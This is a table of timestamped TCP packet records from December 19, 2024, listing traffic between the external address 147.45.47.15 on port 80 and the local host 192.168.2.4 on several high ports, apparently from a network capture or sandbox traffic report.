Dec 19, 2024 08:52:38.434861898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434871912 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434880972 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434911013 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.434911013 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.434953928 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.435642004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.435652971 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.435662031 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.435715914 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.436383009 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.436399937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.436412096 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.436422110 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.436445951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.436499119 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.437201023 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.437217951 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.437251091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.437261105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.437978029 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.437989950 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438000917 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438031912 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.438031912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.438771963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438783884 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438795090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438807011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.438839912 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.438839912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.439497948 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.439508915 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.439519882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.439557076 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.440233946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.440244913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.440254927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.440291882 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.440300941 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.441008091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441026926 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441068888 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441076040 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.441086054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441107988 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.441864967 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441878080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441888094 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.441915035 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.441946030 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.442624092 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.442635059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.442645073 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.442677021 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.443305016 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.443322897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.443335056 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.443347931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.443372965 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.443372965 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.444113016 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444125891 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444137096 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444147110 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444173098 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.444197893 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.444808006 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444839001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444853067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.444886923 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.445611000 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.445621967 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.445632935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.445650101 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.445671082 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.445755959 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.446338892 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.446357012 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.446368933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.446378946 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.446412086 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.446429968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.447160959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447173119 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447182894 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447215080 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.447917938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447930098 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447940111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.447964907 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.447998047 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.448678017 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.448689938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.448698997 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.448713064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.448721886 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.448767900 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.449431896 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.449445009 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.449455976 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.449485064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.450072050 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.450083971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.450117111 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.450525045 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.450536966 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.450566053 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.450949907 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.450967073 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.451005936 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.451462030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.451473951 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.451513052 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.451980114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.452040911 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.452100039 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.452775955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.452820063 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.452866077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.453605890 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.453651905 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.453738928 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.454477072 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.454500914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.454621077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.454668999 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.455349922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.455391884 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.455451965 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.456368923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.456422091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.456590891 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.457165956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.457207918 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.457339048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.458034992 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.458045959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.458080053 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.458767891 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.458815098 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.459013939 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.459677935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.459723949 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.459835052 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.460616112 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.460647106 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.460661888 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.461479902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.461519957 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.461564064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.462393999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.462445021 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.462471962 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.463180065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.463351011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.463392019 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.464133024 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.464184046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.464234114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.464430094 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.464838028 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.464878082 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.464934111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.465708971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.465759039 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.465773106 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.466567039 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.466604948 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.466655970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.467363119 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.467411041 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.467473030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.468236923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.468277931 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.483634949 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.495944977 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.534719944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.534869909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.534909964 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.535264015 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.535567045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.535624027 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.536345959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.536448956 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.536506891 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.537405014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.537559032 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.537674904 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.538527966 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.538667917 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.538714886 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.539588928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.539720058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.539796114 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.540731907 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.540888071 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.541019917 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.542301893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.542521000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.542572975 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.543282032 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.543540955 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.543601036 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.544482946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.544718027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.544771910 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.545031071 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.545233011 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.545284033 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.546118975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.546272993 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.546320915 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.547223091 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.547364950 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.547420025 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.548333883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.548439980 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.548496008 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.550045013 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.550057888 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.550112009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.550482988 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.550745964 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.550853968 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.551604986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.551702976 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.551774979 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.552630901 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.552788973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.553119898 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.553776026 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.553859949 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.553901911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.554830074 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.555042982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.555104971 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.555933952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.556128025 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.556171894 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.557178020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.557560921 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.557596922 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.558103085 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.558281898 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.558357954 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.559339046 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.559494972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.559567928 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.560450077 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.560466051 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.560497046 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.561451912 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.561633110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.561722040 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.562633038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.562647104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.562693119 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.563577890 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.563757896 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.563822031 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.564702034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.564774990 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.565835953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.565882921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.565977097 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.566018105 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.566844940 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.566996098 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.567833900 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.567920923 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.568165064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.568216085 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.569096088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.569446087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.569756985 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.570209980 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.570338964 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.571225882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.571281910 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.571316957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.571363926 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.572302103 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.572468996 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.572783947 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.573487043 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.573501110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.573545933 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.574476004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.574558973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.575556040 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.575604916 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.575670004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.575717926 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.576411963 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.576426029 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.576520920 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.576740980 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.576874971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.576921940 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.577191114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.577204943 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.577392101 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.577708006 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.577862978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.577876091 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.577907085 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.578437090 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.578629017 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.578769922 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.578933954 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.578954935 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.579022884 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.579353094 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.579395056 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.579848051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.580132008 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.580147028 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.580162048 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.580178976 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.580219984 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.580854893 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.580980062 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.581029892 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.581120014 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.581131935 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.581207991 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.581793070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.581950903 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.582170963 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.582191944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.582422018 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.582462072 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.582705975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.582717896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.582840919 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.582999945 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.583014011 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.583127975 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.583369970 CET	80	49731	147.45.47.15	192.168.2.4
